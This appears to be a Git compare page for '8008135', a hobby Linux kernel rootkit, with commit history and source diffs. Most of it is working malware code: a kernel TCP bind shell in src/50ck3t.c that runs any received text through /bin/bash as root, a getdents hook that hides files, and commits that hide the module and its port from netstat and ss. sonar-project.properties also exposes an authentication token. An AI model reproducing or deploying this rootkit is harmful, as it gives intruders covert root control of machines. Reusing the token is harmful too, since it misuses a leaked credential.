valentin_lechner/8008135
1
0
Fork 0
Code Issues Pull Requests Packages Projects Releases Wiki Activity

Compare commits

base: valentin_lechner:v0.1
Branches Tags
valentin_lechner:master
valentin_lechner:dev_jkr
valentin_lechner:dev_vlr
valentin_lechner:v0.1
...
compare: valentin_lechner:master
Branches Tags
valentin_lechner:master
valentin_lechner:dev_jkr
valentin_lechner:dev_vlr
valentin_lechner:v0.1

36 Commits
v0.1 ... master

Author SHA1 Message Date
Valentin Lechner
d2e91393a1 Update Jenkinsfile 2020-01-31 00:08:44 +01:00
Valentin Lechner
1dfb5c4f78 Update Jenkinsfile 2020-01-31 00:07:40 +01:00
Valentin Lechner
74f688b323 Updating sonarfile 2020-01-30 23:39:55 +01:00
valentin_lechner
2b80006e02 Pipeline test 2020-01-30 17:24:27 +01:00
valentin_lechner
566eb7b791 Pipeline Test 2020-01-30 17:16:32 +01:00
valentin_lechner
d8d81efdeb Pipeline Test 2020-01-30 17:14:31 +01:00
valentin_lechner
ff6864f191 Pipeline Test 2020-01-30 17:13:10 +01:00
valentin_lechner
a17c502e4f Pipeline Test 2020-01-30 17:09:39 +01:00
valentin_lechner
13dad459ba Fixing Jenkinsfile 2020-01-30 17:05:04 +01:00
valentin_lechner
03ed30acf3 Added Jenkinsfile and sonarfile 2020-01-30 17:02:13 +01:00
Jan Körner
be224f55a6 Merge branch 'dev_jkr' into 'master' 
# Conflicts:
#   src/8008135.c
 2019-12-08 13:00:19 +00:00
Jan Koerner
3e30a6df32 Socket von ss verstecken 2019-12-08 13:33:50 +01:00
Valentin Lechner
7a486df14c Updating gitignore and Makefile for new needs 2019-12-08 12:05:40 +01:00
Valentin Lechner
6ad05f1c20 OutSourcing 2019-12-08 12:05:07 +01:00
Valentin Lechner
c897df31ec Dude, das war richtig schlecht geschriebener Code 2019-12-08 12:04:42 +01:00
Valentin Lechner
ed5b2fa92a CleanUp 2019-12-08 12:02:33 +01:00
Valentin Lechner
53e95217c2 Removing single-line comments 2019-12-08 12:02:08 +01:00
Valentin Lechner
800779a376 ifdef HARMLESS um ansonsten nicht bentigte Var 2019-12-08 12:01:37 +01:00
Valentin Lechner
04f29d2e03 Skript fr Code Generierung angepasst so dass die explizite Definition der Variablen im c File steht und im Header File die Deklaration fr externes 2019-12-08 12:00:46 +01:00
Valentin Lechner
bbf48681e0 Tun wir mal so als ob wir Helper Funktionen benutzen wrden 2019-12-08 11:59:14 +01:00
valentin lechner
dcd4c6588a Delete 5y563n.h 2019-12-08 01:13:25 +00:00
valentin_lechner
500087d2ca exporting functions to files 2019-12-08 01:10:48 +00:00
valentin_lechner
bd0a37f68b Merge remote-tracking branch 'origin/master' into dev_vlr 2019-12-08 00:25:52 +00:00
valentin_lechner
4a8df7d308 Downstream merge to get access to latest ver 
Merge branch 'master' into dev_vlr
 2019-12-08 00:22:06 +00:00
Jan Körner
a598ee7319 Merge branch 'master' into 'dev_jkr' 
Master

See merge request jan-koerner-enterprises/8008135!2
 2019-12-07 23:34:31 +00:00
Jan Koerner
14a0ea6b8f hide open port from netstat 2019-12-08 00:31:43 +01:00
Valentin Lechner
4aa1387a89 Adding call_usermodehelper to input commands as root 2019-12-07 15:37:35 +01:00
Valentin Lechner
f187dc64d3 Merge branch 'dev_vlr' 2019-12-05 20:14:10 +01:00
Jan Körner
f613f77845 Merge branch 'dev_jkr' into 'master' 
Modul verstecken implementiert

See merge request jan-koerner-enterprises/8008135!1
 2019-12-01 22:48:31 +00:00
Jan Koerner
b02de7a8e0 Modul verstecken implementiert 2019-12-01 23:45:00 +01:00
Jan Koerner
cbe0fabcea Modul verstecken implementiert 2019-12-01 23:40:43 +01:00
Jan Koerner
4f9a5c5143 Updated .gitignore 2019-12-01 17:28:03 +01:00
Valentin Lechner
3abccec17e Refactoring 2019-11-22 16:40:18 +01:00
Valentin Lechner
24a629d7e8 Renaming TODO to TODO.md for online markdown support 2019-11-22 00:46:13 +01:00
Valentin Lechner
6306de6234 Adding TODO file 2019-11-22 00:44:19 +01:00
Valentin Lechner
28c4025758 Adding a Socket Server to the Linux Kernel Module 
Gone a long way from trying to implement a socket bindshell
using the standard C-Libraries (which obv. doesn't work in LKM!),
then implementing an ASM-Solution only to find out there are problems
with the x86/x32 bit and knowing that I have no clue of how to write ASM,
I thought of looking into sockets on linux kernel modules - AAAND
found one. So the files:
* src/50ck3t.c
* src/headers/50ck3t.h
are basically from
https://github.com/abysamross/simple-linux-kernel-tcp-client-server.git
Thanks for sharing! There will prob. be some additions and modifications.

Makefile:
* Some Stuff had to be renamed in the Makefile due to
Renaming src/create_sysgen.sh -> src/cr3473_5y563n.sh &
Added src/headers/50ck3t.h, src/50ck3t.c

Including src/headers/50ck3t.h in 8008135.c

Changing Module License to GPL, somehow GPLv3 was a problem to the compiler
because of do_exit
 2019-11-22 00:32:36 +01:00
20 changed files with 1492 additions and 119 deletions
Show Stats Expand all files Collapse all files

3
.gitignore vendored
View File

@ -9,9 +9,10 @@ sysgen.h
*.a
*.ko
*.o
*5y563n.*
*~
*.symvers
*.order
.tmp_versions/
*.cmd
.vscode/

26
Jenkinsfile vendored Normal file
View File

@ -0,0 +1,26 @@
#!/usr/bin/env groovy
pipeline {
agent any
stages{
stage('checkout VCS'){
steps{
checkout scm
}
}
stage('compile'){
steps{
sh 'echo "fake-compiling..."'
}
}
stage('deploySONAR'){
steps{
sh 'sonar-scanner'
}
}
}
}

12
Makefile
View File

@ -19,12 +19,18 @@ INCL_H := $(PWD)/$(INCL_S)/headers
obj-m += $(MNAME).o
# Core
$(MNAME)-y += src/$(MNAME).o
$(MNAME)-y += src/637d3n75.o
$(MNAME)-y += src/50ck3t.o
$(MNAME)-y += src/h1d3p0r7.o
$(MNAME)-y += src/h1d3m0dul3.o
$(MNAME)-y += src/p463unpr073c7.o
$(MNAME)-y += src/5y563n.o
# Includes for header files etc
ccflags-y := -I$(SRCS_H) -I$(LIBS_H) -I$(INCL_H)
ccflags-y := -I$(SRCS_H) -I$(LIBS_H) -I$(INCL_H) -Wall
all:
$(shell $(SRCS_S)/create_sysgen.sh)
$(shell $(SRCS_S)/cr3473_5y563n.sh)
$(MAKE) -C $(BUILDDIR) M=$(PWD) modules
load:
@ -34,5 +40,5 @@ unload:
rmmod $(MNAME)
clean:
-rm $(SRCS_H)/sysgen.h
-rm $(SRCS_H)/5y563n.h
$(MAKE) -C $(BUILDDIR) M=$(PWD) clean

10
TODO.md Normal file
View File

@ -0,0 +1,10 @@
# Pick One
## TCP Socket
* Add binding to shell:
* Incoming commands have to be redir to bash
* STDOUT, STDIN, STDERR Handling
* Remove chat, debug stuff
* Hide open Port
## Module
* Hide itself

187
sonar-project.properties Normal file
View File

@ -0,0 +1,187 @@
#*******************************************************************************
#
# FILE: sonar-project.properties
#
# USAGE:
#
# DESCRIPTION:
#
# OPTIONS: -
# REQUIREMENTS: SonarQube/SonarCloud
# BUGS: Hoffentlich keine, bei Problemen bitte kontaktieren
# NOTES:
# AUTHOR: vlr
# ORGANIZATION: Jan Koerner Enterprises
# CREATED: 30.01.2019 22:22:55
# REVISION: 1
#*******************************************************************************
# Diese Datei ist das Äquivalent der "Jenkins"- oder "Dockerfile" für SonarQube
# Anhand in dieser Datei spezifizierter Parameter wird das Entwicklungsprojekt
# von SonarQube analysiert
#*** Allgemeines *************************************************************
# Host URL, muss angegeben werden
sonar.host.url=https://sonar.fuxxbau.net
# Default: <url> (maven)
sonar.links.homepage=https://www.fuxxbau.net
# Default: <ci-management> (maven)
sonar.links.ci=http://jenkins.fuxxbau.net
# Default: System Encoding
sonar.sourceEncoding=UTF-8
# sonar.organization=highQ
#*******************************************************************************
#*** Debug *******************************************************************
# M\"ogliche Werte: DEBUG, INFO
# Default: INFO
sonar.log.level=DEBUG
# Ausgabe aller spezifizierten Einstellungen zur Scanner API in ein File
# sonar.scanner.dumpToFile=dump.txt
# Stelle, an die vom Scanner die "report-task.txt" geschrieben wird
# Default: sonar.working.directory
# sonar.scanner.metadataFilePath=
# Stelle in Logs dar, an welchen Stellen der Analyzer wv Zeit ben\"otigt
# Logs zu finden in workingDir/profiling/moduleKey-profiler.xml
# workingDir=.sonar/profiling (sonarscanner)
# bzw target/sonar/profiling (sonarscanner for maven)
# Default: false
# sonar.showProfiling=
# NOTE: There is the potential for this setting to expose sensitive information
# such as passwords if they are stored as server-side environment variables.
# sonar.verbose=
#*******************************************************************************
#*** Projekt *****************************************************************
# Der einzigartige Key des Projekts (Maven Default: <groupId>:<artifactId>
# Erlaubt sind hier Zahlen, Buchstaben, "-","_",".",":"
# mindestens ein char muss keine Zahl sein
# muss angegeben sein, entweder durch maven oder manuell
sonar.projectKey=JKE-8008135
# Hier kann entweder Login über einen Nutzer erstellt werden oder \"uber
# ein Login-Token (Weboberfläche -> My Account -> Security -> Generate Token)
# Wenn sonar.password leer ist wird sonar.login als Auth-Token interpretiert
# Alternativ: Anyone-Gruppe Analyse Rechte zuweisen (Serverseitig)
sonar.login=f116f5c7835d1a62d364355fb24e7ca8e416575e
# sonar.password=
# Name, der in der Weboberfläche angezeigt wird
sonar.projectName=JKE-8008135
# Default: <version> (maven), sonst "not provided"
# sonar.projectVersion=
# Default: <description> (maven)
# sonar.projectDescription=
# Kann nicht früher als das letzte Datum der Analyse dieses Projekts in DB sein
# Default:Now. Angabe in yyyy-MM-dd
# sonar.projectDate=
# Kann verwendet werden um zu bestimmen dass die Analyse des Projekts an
# anderer Stelle stattfindet
# ben\"otigt Schreibrechte f\"ur Erstellung von sonar.working.directory
# Default=./
# sonar.projectBaseDir=
#*******************************************************************************
# Max Zeit um auf Webservice Call zu warten (in sec, Default 60)
# Nützlich um auf Timeouts zu reagieren
# sonar.ws.timeout=
#*** SCM *********************************************************************
# Das Plugin, das von SonarQube für das Abfragen von SCM Daten verwendet wird
# Default: Autodetect (-> svn, wenn .svn Ordner hier existiert; git wenn .git)
sonar.scm.provider=git
# Standardm\"assig werden nur bei ver\"anderten Files blame Informationen geladen
# Wenn die Daten outdatet sind, kann man hier auf "true" stellen um upzudaten
# sonar.scm.forceReloadAll=
# Standardm\"assig werden Dateien die vom SCM ignoriert werden (bsp .gitignore)
# bei der Analyse ebenfalls ignoriert.
# Wenn man diesen Wert hier auf true setzt, disabled man dieses Feature
# Default: false
# sonar.scm.exclusions.disabled=
# Überschreiben der Revision
# Default: Provided von CI oder von source geraten
# sonar.scm.revision=
# Default: <issueManagement><url> (maven)
# sonar.links.issue=
# Default: <scm><url> (maven)
# sonar.links.scm=
# Comma Seperated Pfadliste für Generic Issue Reports
# sonar.externalIssuesReportPaths=
#*******************************************************************************
#*** Build *******************************************************************
# Wenn weder sonar.sources noch sonar.tests gegeben: BaseDir(=./)
# Default: Wird aus Build Sys gelesen (Maven, Gradle, MSBuild).
sonar.sources=.
# Default: Wird aus Build Sys gelesen (Maven, Gradle, MSBuild). Sonst leer
# sonar.tests=
# Habe ich nicht ganz einordnen k\"onnen, wof\"ur.
# Offizieller Text:
# The string passed with this property will be stored with the analysis and available in the results of api/project_analyses/search, thus allowing you to later identify a specific analysis and obtain its ID for use with api/project_analyses/set_baseline.
# sonar.buildString=
#*******************************************************************************
#*** Analyse *****************************************************************
# Default:.scannerwork
# sonar.working.directory=
# Hinzuf\"ugen von key-value Paaren zum Analysekontext (-> Webhooks)
# sonar.analysis.[Key001]=
# sonar.analysis.[Key002]=
# Standardm\"assig gilt ein Code als dupliziert wenn mind. 100 Token des Codes
# gleich sind (über 10 Zeilen hinweg)
# Kann sprachenspezifisch überschrieben werden
# sonar.cpd.${language}.minumumtokens=
# sonar.cpd.${language}.minimumLines=
# Diese Parameter sorgen daf\"ur, dass Code zwischen Bl\"ocken nicht analysiert
# wird. Leider werden diese Parameter nicht offiziell unterst\"utzt
# https://community.sonarsource.com/t/how-to-set-sonar-issue-ignore-block-in-sonar-project-properties/10943/6
# Offiziell unterst\"utzt wird nur eine globale Einstellung im Webinterface
# siehe:
# Administration->Configuration->General->Analysis Scope->Ignore Issues in Blocks
# Wird von einem SonarQube Entwickler als "Hack" bezeichnet, was ich nicht
# verstehe, es ist mmN legitim, hier Proj Spezifische Settings zu haben (oder zmd: zu haben wollen).
# Wahrscheinlich ist es auch m\"oglich, andere Einstellungen die im WebUI
# zu finden sind hier zu "hacken"
# sonar.issue.ignore.block=ignore-generated
# sonar.issue.ignore.block.ignore-generated.beginBlockRegexp=DA-ELSE
# sonar.issue.ignore.block.ignore-generated.endBlockRegexp=DA-END
# Hier ein weiteres Beispiel, bei dem das ganze file von Analyse ausgeschlossen
# wird, wenn "@sonar-disable" im File vorkommt
# sonar.issue.ignore.allfile=ignore-file
# sonar.issue.ignore.allfile.ignore-file.fileRegexp=@sonar-disable
#*******************************************************************************

567
src/50ck3t.c Normal file
View File

@ -0,0 +1,567 @@
/*
*
* NOTE:
* this is basically this guys code:
* https://github.com/abysamross/simple-linux-kernel-tcp-client-server.git
* his last update was 4 years ago, so there might be some changes,
* there definitely will be some regarding the data received/sent back since
* this is will be used as a bindshell
* but base is his work.
*
*/
/* -*- Mode: C; indent-tabs-mode: t; c-basic-offset: 4; tab-width: 4 -*- */
/*
* main.c
* Copyright (C) 2019
*
* 8008135 is free software: you can redistribute it and/or modify it
* under the terms of the GNU General Public License as published by the
* Free Software Foundation, either version 3 of the License, or
* (at your option) any later version.
*
* 8008135 is distributed in the hope that it will be useful, but
* WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
* See the GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License along
* with this program. If not, see <http://www.gnu.org/licenses/>.
*/
/**** includes *****************************************************************
*******************************************************************************/
#include "50ck3t.h"
#ifdef HARMLESS
#else
#include <linux/init.h>
#include "610b415.h"
#endif
/**** types *******************************************************************
*******************************************************************************/
#ifdef HARMLESS
#else
static char *SEnvP[] = {
"HOME=/",
NULL
};
#endif
struct tcp_conn_handler_data{
struct sockaddr_in *FAddress;
struct socket *FAcceptSocket;
int FThreadID;
};
struct tcp_conn_handler{
struct tcp_conn_handler_data *data[MAX_CONNS];
struct task_struct *thread[MAX_CONNS];
int tcp_conn_handler_stopped[MAX_CONNS];
};
struct tcp_conn_handler *STCPConnHandler;
struct tcp_server_service{
int FRunning;
struct socket *FListenSocket;
struct task_struct *FThread;
struct task_struct *FAccpeptThread;
};
struct tcp_server_service *FTCPServer_Service;
/**** var **********************************************************************
*******************************************************************************/
static int STCPListenerStopped = 0;
static int STCPAcceptorStopped = 0;
char *inet_ntoa(struct in_addr *AInAddr){
char *LIPAddr = NULL;
u_int32_t LIPInt = 0;
LIPAddr = kmalloc(16 * sizeof(char), GFP_KERNEL);
if(!LIPAddr)
return NULL;
else
memset(LIPAddr, 0, 16);
LIPInt = AInAddr->s_addr;
sprintf(LIPAddr, "%d.%d.%d.%d", (LIPInt) & 0xFF, (LIPInt >> 8) & 0xFF,
(LIPInt >> 16) & 0xFF, (LIPInt >> 16) & 0xFF);
return LIPAddr;
}
int tcp_server_send(struct socket *ASocket, int AID, const char *ABuf,\
const size_t ALength, unsigned long AFlags){
struct msghdr LMsgHeader;
struct kvec LVec;
int LLen, LWritten, LLeft;
mm_segment_t LOldMM;
LWritten = 0;
LLeft = ALength;
LMsgHeader.msg_name = 0;
LMsgHeader.msg_namelen = 0;
LMsgHeader.msg_control = NULL;
LMsgHeader.msg_controllen = 0;
LMsgHeader.msg_flags = AFlags;
LMsgHeader.msg_flags = 0;
LOldMM = get_fs(); set_fs(KERNEL_DS);
repeat_send:
LVec.iov_len = LLeft;
LVec.iov_base = (char *)ABuf + LWritten;
LLen = kernel_sendmsg(ASocket, &LMsgHeader, &LVec, LLeft, LLeft);
if((LLen == -ERESTARTSYS) || (!(AFlags & MSG_DONTWAIT) &&\
(LLen == -EAGAIN)))
goto repeat_send;
if(LLen > 0){
LWritten += LLen;
LLeft -= LLen;
if(LLeft)
goto repeat_send;
}
set_fs(LOldMM);
return LWritten?LWritten:LLen;
}
int tcp_server_receive(struct socket *ASock, int AID,struct sockaddr_in *AAddress,\
unsigned char *ABuf,int ASize, unsigned long AFlags){
struct msghdr LMsgHeader;
struct kvec LVec;
int LLen;
char *LTmp = NULL;
if(ASock==NULL){
pr_info(" *** mtp | tcp server receive socket is NULL| "
" tcp_server_receive *** \n");
return -1;
}
LMsgHeader.msg_name = 0;
LMsgHeader.msg_namelen = 0;
LMsgHeader.msg_control = NULL;
LMsgHeader.msg_controllen = 0;
LMsgHeader.msg_flags = AFlags;
LVec.iov_len = ASize;
LVec.iov_base = ABuf;
read_again:
if(!skb_queue_empty(&ASock->sk->sk_receive_queue))
pr_info("recv queue empty ? %s \n",
skb_queue_empty(&ASock->sk->sk_receive_queue)?"yes":"no");
LLen = kernel_recvmsg(ASock, &LMsgHeader, &LVec, ASize, ASize, AFlags);
if(LLen == -EAGAIN || LLen == -ERESTARTSYS)
goto read_again;
LTmp = inet_ntoa(&(AAddress->sin_addr));
pr_info("client-> %s:%d, says: %s\n", LTmp, ntohs(AAddress->sin_port), ABuf);
kfree(LTmp);
return LLen;
}
int connection_handler(void *AData){
struct tcp_conn_handler_data *LConnData =
(struct tcp_conn_handler_data *)AData;
struct sockaddr_in *LAddress = LConnData->FAddress;
struct socket *LAcceptSocket = LConnData->FAcceptSocket;
int LID = LConnData->FThreadID;
int LRet;
int LLen = 49;
unsigned char LInBuf[LLen+1];
#ifdef HARMLESS
unsigned char LOutBuf[LLen+1];
#else
#endif
DECLARE_WAITQUEUE(recv_wait, current);
allow_signal(SIGKILL|SIGSTOP);
while(1){
add_wait_queue(&LAcceptSocket->sk->sk_wq->wait, &recv_wait);
while(skb_queue_empty(&LAcceptSocket->sk->sk_receive_queue)){
__set_current_state(TASK_INTERRUPTIBLE);
schedule_timeout(HZ);
if(kthread_should_stop()){
pr_info(" *** mtp | tcp server handle connection "
"thread stopped | connection_handler *** \n");
//tcp_conn_handler->thread[id] = NULL;
STCPConnHandler->tcp_conn_handler_stopped[LID]= 1;
__set_current_state(TASK_RUNNING);
remove_wait_queue(&LAcceptSocket->sk->sk_wq->wait,\
&recv_wait);
kfree(STCPConnHandler->data[LID]->FAddress);
kfree(STCPConnHandler->data[LID]);
sock_release(STCPConnHandler->data[LID]->FAcceptSocket);
return 0;
}
if(signal_pending(current)){
__set_current_state(TASK_RUNNING);
remove_wait_queue(&LAcceptSocket->sk->sk_wq->wait,\
&recv_wait);
goto out;
}
}
__set_current_state(TASK_RUNNING);
remove_wait_queue(&LAcceptSocket->sk->sk_wq->wait, &recv_wait);
pr_info("receiving message\n");
memset(LInBuf, 0, LLen+1);
LRet = tcp_server_receive(LAcceptSocket, LID, LAddress, LInBuf, LLen,\
MSG_DONTWAIT);
if(LRet > 0){
#ifdef HARMLESS
if(memcmp(LInBuf, "HOLA", 4) == 0){
memset(LOutBuf, 0, LLen+1);
strcat(LOutBuf, "HOLASI");
pr_info("sending response: %s\n", LOutBuf);
tcp_server_send(LAcceptSocket, LID, LOutBuf,\
strlen(LOutBuf), MSG_DONTWAIT);
}
if(memcmp(LInBuf, "ADIOS", 5) == 0){
memset(LOutBuf, 0, LLen+1);
strcat(LOutBuf, "ADIOSAMIGO");
pr_info("sending response: %s\n", LOutBuf);
tcp_server_send(LAcceptSocket, LID, LOutBuf,\
strlen(LOutBuf), MSG_DONTWAIT);
break;
}
#else
int Ret;
printk(LInBuf);
char *LArgV[] = {"/bin/bash", "-c", LInBuf, NULL};
printk("Calling usermodehelper");
Ret = call_usermodehelper(LArgV[0], LArgV, SEnvP, UMH_WAIT_EXEC);
printk("\nRet is %i \n", Ret);
#endif
}
}
out:
STCPConnHandler->tcp_conn_handler_stopped[LID]= 1;
kfree(STCPConnHandler->data[LID]->FAddress);
kfree(STCPConnHandler->data[LID]);
sock_release(STCPConnHandler->data[LID]->FAcceptSocket);
STCPConnHandler->thread[LID] = NULL;
do_exit(0);
}
int tcp_server_accept(void){
int LAcceptErr = 0;
struct socket *LSocket;
struct socket *LAcceptSocket = NULL;
struct inet_connection_sock *LISock;
int LID = 0;
DECLARE_WAITQUEUE(accept_wait, current);
allow_signal(SIGKILL|SIGSTOP);
LSocket = FTCPServer_Service->FListenSocket;
pr_info(" *** mtp | creating the accept socket | tcp_server_accept "
"*** \n");
while(1){
struct tcp_conn_handler_data *LTCPConnHData = NULL;
struct sockaddr_in *LClient = NULL;
char *LTmp;
int addr_len;
LAcceptErr =
sock_create(LSocket->sk->sk_family, LSocket->type,\
LSocket->sk->sk_protocol, &LAcceptSocket);
if(LAcceptErr < 0 || !LAcceptSocket){
pr_info(" *** mtp | accept_error: %d while creating "
"tcp server accept socket | "
"tcp_server_accept *** \n", LAcceptErr);
goto err;
}
LAcceptSocket->type = LSocket->type;
LAcceptSocket->ops = LSocket->ops;
LISock = inet_csk(LSocket->sk);
add_wait_queue(&LSocket->sk->sk_wq->wait, &accept_wait);
while(reqsk_queue_empty(&LISock->icsk_accept_queue)){
__set_current_state(TASK_INTERRUPTIBLE);
schedule_timeout(HZ);
if(kthread_should_stop()){
pr_info(" *** mtp | tcp server acceptor thread "
"stopped | tcp_server_accept *** \n");
STCPAcceptorStopped = 1;
__set_current_state(TASK_RUNNING);
remove_wait_queue(&LSocket->sk->sk_wq->wait,\
&accept_wait);
sock_release(LAcceptSocket);
return 0;
}
if(signal_pending(current)){
__set_current_state(TASK_RUNNING);
remove_wait_queue(&LSocket->sk->sk_wq->wait,\
&accept_wait);
goto release;
}
}
__set_current_state(TASK_RUNNING);
remove_wait_queue(&LSocket->sk->sk_wq->wait, &accept_wait);
LAcceptErr = LSocket->ops->accept(LSocket, LAcceptSocket, O_NONBLOCK);
if(LAcceptErr < 0){
pr_info(" *** mtp | accept_error: %d while accepting "
"tcp server | tcp_server_accept *** \n",
LAcceptErr);
goto release;
}
LClient = kmalloc(sizeof(struct sockaddr_in), GFP_KERNEL);
memset(LClient, 0, sizeof(struct sockaddr_in));
addr_len = sizeof(struct sockaddr_in);
LAcceptErr = LAcceptSocket->ops->getname(LAcceptSocket,
(struct sockaddr *)LClient,
&addr_len, 2);
if(LAcceptErr < 0){
pr_info(" *** mtp | accept_error: %d in getname "
"tcp server | tcp_server_accept *** \n",
LAcceptErr);
goto release;
}
LTmp = inet_ntoa(&(LClient->sin_addr));
pr_info("connection from: %s %d \n",
LTmp, ntohs(LClient->sin_port));
kfree(LTmp);
pr_info("handle connection\n");
for(LID = 0; LID < MAX_CONNS; LID++){
if(STCPConnHandler->thread[LID] == NULL)
break;
}
pr_info("gave free id: %d\n", LID);
if(LID == MAX_CONNS)
goto release;
LTCPConnHData = kmalloc(sizeof(struct tcp_conn_handler_data), GFP_KERNEL);
memset(LTCPConnHData, 0, sizeof(struct tcp_conn_handler_data));
LTCPConnHData->FAddress = LClient;
LTCPConnHData->FAcceptSocket = LAcceptSocket;
LTCPConnHData->FThreadID = LID;
STCPConnHandler->tcp_conn_handler_stopped[LID] = 0;
STCPConnHandler->data[LID] = LTCPConnHData;
STCPConnHandler->thread[LID] =
kthread_run((void *)connection_handler, (void *)LTCPConnHData, MODULE_NAME);
if(kthread_should_stop()){
pr_info(" *** mtp | tcp server acceptor thread stopped"
" | tcp_server_accept *** \n");
STCPAcceptorStopped = 1;
return 0;
}
if(signal_pending(current)){
break;
}
}
STCPAcceptorStopped = 1;
do_exit(0);
release:
sock_release(LAcceptSocket);
err:
STCPAcceptorStopped = 1;
do_exit(0);
}
int tcp_server_listen(void)
{
int LServerErr;
struct socket *LConnSocket;
struct sockaddr_in LServer;
DECLARE_WAIT_QUEUE_HEAD(wq);
allow_signal(SIGKILL|SIGTERM);
LServerErr = sock_create(PF_INET, SOCK_STREAM, IPPROTO_TCP,\
&FTCPServer_Service->FListenSocket);
if(LServerErr < 0){
pr_info(" *** mtp | Error: %d while creating tcp server "
"listen socket | tcp_server_listen *** \n", LServerErr);
goto err;
}
LConnSocket = FTCPServer_Service->FListenSocket;
FTCPServer_Service->FListenSocket->sk->sk_reuse = 1;
LServer.sin_addr.s_addr = INADDR_ANY;
LServer.sin_family = AF_INET;
LServer.sin_port = htons(DEFAULT_PORT);
LServerErr =
LConnSocket->ops->bind(LConnSocket, (struct sockaddr*)&LServer,\
sizeof(LServer));
if(LServerErr < 0){
pr_info(" *** mtp | Error: %d while binding tcp server "
"listen socket | tcp_server_listen *** \n", LServerErr);
goto release;
}
LServerErr = LConnSocket->ops->listen(LConnSocket, 16);
if(LServerErr < 0){
pr_info(" *** mtp | Error: %d while listening in tcp "
"server listen socket | tcp_server_listen "
"*** \n", LServerErr);
goto release;
}
FTCPServer_Service->FAccpeptThread =
kthread_run((void*)tcp_server_accept, NULL, MODULE_NAME);
while(1){
wait_event_timeout(wq, 0, 3*HZ);
if(kthread_should_stop()){
pr_info(" *** mtp | tcp server listening thread"
" stopped | tcp_server_listen *** \n");
return 0;
}
if(signal_pending(current))
goto release;
}
sock_release(LConnSocket);
STCPListenerStopped = 1;
do_exit(0);
release:
sock_release(LConnSocket);
err:
STCPListenerStopped = 1;
do_exit(0);
}
int tcp_server_start(void){
FTCPServer_Service->FRunning = 1;
FTCPServer_Service->FThread = kthread_run((void *)tcp_server_listen, NULL,\
MODULE_NAME);
return 0;
}
int network_server_init(void){
pr_info(" *** mtp | network_server initiated | "
"network_server_init ***\n");
FTCPServer_Service = kmalloc(sizeof(struct tcp_server_service), GFP_KERNEL);
memset(FTCPServer_Service, 0, sizeof(struct tcp_server_service));
STCPConnHandler = kmalloc(sizeof(struct tcp_conn_handler), GFP_KERNEL);
memset(STCPConnHandler, 0, sizeof(struct tcp_conn_handler));
tcp_server_start();
return 0;
}
void network_server_exit(void){
int ret;
int id;
if(FTCPServer_Service->FThread == NULL)
pr_info(" *** mtp | No kernel thread to kill | "
"network_server_exit *** \n");
else
{
for(id = 0; id < MAX_CONNS; id++)
{
if(STCPConnHandler->thread[id] != NULL)
{
if(!STCPConnHandler->tcp_conn_handler_stopped[id])
{
ret =
kthread_stop(STCPConnHandler->thread[id]);
if(!ret)
pr_info(" *** mtp | tcp server "
"connection handler thread: %d "
"stopped | network_server_exit "
"*** \n", id);
}
}
}
if(!STCPAcceptorStopped)
{
ret = kthread_stop(FTCPServer_Service->FAccpeptThread);
if(!ret)
pr_info(" *** mtp | tcp server acceptor thread"
" stopped | network_server_exit *** \n");
}
if(!STCPListenerStopped)
{
ret = kthread_stop(FTCPServer_Service->FThread);
if(!ret)
pr_info(" *** mtp | tcp server listening thread"
" stopped | network_server_exit *** \n");
}
if(FTCPServer_Service->FListenSocket != NULL && !STCPListenerStopped)
{
sock_release(FTCPServer_Service->FListenSocket);
FTCPServer_Service->FListenSocket = NULL;
}
kfree(STCPConnHandler);
kfree(FTCPServer_Service);
FTCPServer_Service = NULL;
}
}

20
src/610b415.c Normal file
View File

@ -0,0 +1,20 @@
/*
* 610b415.c
*
* Created on: Dec 6, 2019
* Author: vlr
*/
#include "610b415.h"
char * stringRemoveChars(char *AString, char *ASpanset){
char *LPtr = AString;
LPtr = strpbrk(LPtr, ASpanset);
while(LPtr != NULL) {
*LPtr = ' ';
LPtr = strpbrk(LPtr, AString);
}
return AString;
}

74
src/637d3n75.c Normal file
View File

@ -0,0 +1,74 @@
/* -*- Mode: C; indent-tabs-mode: t; c-basic-offset: 4; tab-width: 4 -*- */
/*
* main.c
* Copyright (C) 2019
*
* 8008135 is free software: you can redistribute it and/or modify it
* under the terms of the GNU General Public License as published by the
* Free Software Foundation, either version 3 of the License, or
* (at your option) any later version.
*
* 8008135 is distributed in the hope that it will be useful, but
* WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
* See the GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License along
* with this program. If not, see <http://www.gnu.org/licenses/>.
*/
/*******************************************************************************/
/**** includes *****************************************************************
*******************************************************************************/
#include "637d3n75.h"
/*** var ********************************************************************
*******************************************************************************/
sys_getdents_ptr sys_getdents_orig;
/*******************************************************************************/
/*** FUNCTION ****************************************************************
* NAME: sys_getdents_new
* DESCRIPTION: function overriding the original getdents
* PARAMETERS: -
* RETURNS: -
*******************************************************************************/
asmlinkage long sys_getdents_new(unsigned int fd,
struct linux_dirent __user *dirent,
unsigned int count){
int boff;
struct linux_dirent* ent;
long ret = sys_getdents_orig(fd, dirent, count);
char* dbuf;
if (ret <= 0) {
return ret;
}
dbuf = (char*)dirent;
for (boff = 0; boff < ret;) {
ent = (struct linux_dirent*)(dbuf + boff);
if ((strncmp(ent->d_name, HIDE_PREFIX, HIDE_PREFIX_SZ) == 0)
|| (strstr(ent->d_name, MODULE_NAME) != NULL)) {
memcpy(dbuf + boff,
dbuf + boff + ent->d_reclen,
ret - (boff + ent->d_reclen));
ret -= ent->d_reclen;
} else {
boff += ent->d_reclen;
}
}
return ret;
}

115
src/8008135.c
View File

@ -17,116 +17,61 @@
* with this program. If not, see <http://www.gnu.org/licenses/>.
*/
/*******************************************************************************/
/**** includes *****************************************************************
*******************************************************************************/
#include "8008135.h"
/**** var ********************************************************************
*******************************************************************************/
sys_getdents_t sys_getdents_orig = NULL;
/*** FUNCTION ****************************************************************
* NAME: sys_getdents_new
* DESCRIPTION: function overriding the original getdents
* PARAMETERS: -
* RETURNS: -
*******************************************************************************/
asmlinkage long sys_getdents_new(unsigned int fd,
struct linux_dirent __user *dirent,
unsigned int count) {
int boff;
struct linux_dirent* ent;
long ret = sys_getdents_orig(fd, dirent, count);
char* dbuf;
if (ret <= 0) {
return ret;
}
dbuf = (char*)dirent;
// go through the entries, looking for one that has our prefix
for (boff = 0; boff < ret;) {
ent = (struct linux_dirent*)(dbuf + boff);
// if it has hide prefix or module name anywhere, hide it
